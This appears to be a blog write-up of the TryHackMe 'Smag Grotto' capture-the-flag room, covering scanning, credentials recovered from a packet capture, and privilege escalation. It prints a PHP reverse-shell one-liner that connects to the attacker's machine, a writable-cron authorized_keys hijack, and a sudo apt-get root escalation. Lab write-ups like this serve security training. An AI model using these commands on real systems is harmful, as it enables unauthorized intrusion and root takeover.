TryHackMe: Smag Grotto Writeup

easy THM room smag grotto room background image


1. Scanning & Enumeration

We do the below scans in parallel.

1.1. Port Scanning

Not shown: 998 closed ports
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 74:e0:e1:b4:05:85:6a:15:68:7e:16:da:f2:c7:6b:ee (RSA)
| 256 bd:43:62:b9:a1:86:51:36:f8:c7:df:f9:0f:63:8f:a3 (ECDSA)
|_ 256 f9:e7:da:07:8f:10:af:97:0b:32:87:c9:32:d7:1b:76 (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Smag
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Nothing too special.

1.2. Web Enumeration

└─$ gobuster dir -w /usr/share/wordlists/dirbuste-list-2.3-medium.txt -x 'php,html,txt' -t 32 -q -219
/index.php (Status: 200) [Size: 402]
/mail (Status: 301) [Size: 311] []

/mail/ looks interesting. We explore that below.

1.3. Web Exploration

homepage of smag grotto
the mail directory showing some interesting conversations and a file

We add the smag.thm line in /etc/hosts file, looking at their emails.

└─$ cat /etc/hosts localhost kali smag.thm
# The following lines are desirable for IPv6 capable hosts
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters

1.4. Wireshark

The website has a file, which we can download just by clicking on it. Exploring it further.

In one of the packets, we found:

POST /login.php HTTP/1.1
Host: development.smag.thm
User-Agent: curl/7.47.0
Accept: */*
Content-Length: 39
Content-Type: application/x-www-form-urlencoded
username={hidden}&password={wow_very_nice}HTTP/1.1 200 OK
Date: Wed, 03 Jun 2020 18:04:07 GMT
Server: Apache/2.4.18 (Ubuntu)
Content-Length: 0
Content-Type: text/html; charset=UTF-8

Add the development.smag.thm along with smag.thm domain in the /etc/hosts file. It thus looks like the following.

└─$ cat /etc/hosts localhost kali smag.thm development.smag.thm
# The following lines are desirable for IPv6 capable hosts
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters

2. Foothold

Logging in using the credentials from wireshark, we get a place to enter commands.

admin page after logging in the subdomain

I tried a bunch of commands, and this one stuck: php -r '$sock=fsockopen("MY_KALI_IP",4444);exec("sh <&3 >&3 2>&3");'

We get a shell!

└─$ nc -lvnp 4444
listening on [any] 4444 ...
connect to [] from (UNKNOWN) [] 33886
bash -i
bash: cannot set terminal process group (707): Inappropriate ioctl for device
bash: no job control in this shell

3. PrivEsc

Looking around, I found something intersting in /etc/crontab in the last line.

www-data@smag:/$ cat /etc/crontab
cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.
# m h dom mon dow user command
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
* * * * * root /bin/cat /opt/.backups/ > /home/jake/.ssh/authorized_keys

We see the file /opt/.backups/ is put into jake’s authorized keys. This means that if I can get my own, kali SSH public key in here, I would be able to login without a password.

First, we need to make sure we have writing permissions.

www-data@smag:/$ ls -la /opt/.backups/
ls -la /opt/.backups/
-rw-rw-rw- 1 root root 563 Jun 5 2020 /opt/.backups/

Great! Now I copy pasted my own key here.

www-data@smag:/$ echo "ssh-rsa {wow_nice_looking_key_uh} kali@kali" > /opt/.backups/

And …

└─$ ssh jake@
The authenticity of host ' (' can't be established.
ECDSA key fingerprint is SHA256:MMv7NKmeLS/aEUSOLy0NbyGrLCEKErHJTp1cIvsxnpA.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '' (ECDSA) to the list of known hosts.
Welcome to Ubuntu 16.04.6 LTS (GNU/Linux 4.4.0-142-generic x86_64)
* Documentation:
* Management:
* Support:
Last login: Fri Jun 5 10:15:15 2020


Now for PrivEsc to root. Exploring a bit, I found:

jake@smag:~$ sudo -l
Matching Defaults entries for jake on smag:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User jake may run the following commands on smag:
(ALL : ALL) NOPASSWD: /usr/bin/apt-get

Using GTFOBins — apt-get sudo exploit

jake@smag:~$ sudo apt-get update -o APT::Update::Pre-Invoke::=/bin/sh
# whoami

System compromised!




Trying out some stuff.

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

What would you do differently if you were learning to code from day 1 all over again?

Serve static webpages with FreePascal

Setting up Google Cloud with Kubernetes, Nginx Ingress and Let’s Encrypt (Certmanager)

Monitor akka streams graph

Setting Up Masscan for Enumeration(Part 1)

My Story Featuring four amazing individuals at Andela bootcamp

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Tanishq Chaudhary

Tanishq Chaudhary

Trying out some stuff.

More from Medium

Knight CTF

Unauthenticated Sensitive Information Disclosure | CVE-2021–38314

Tryhackme | Nmap

THM — File Inclusion WriteUp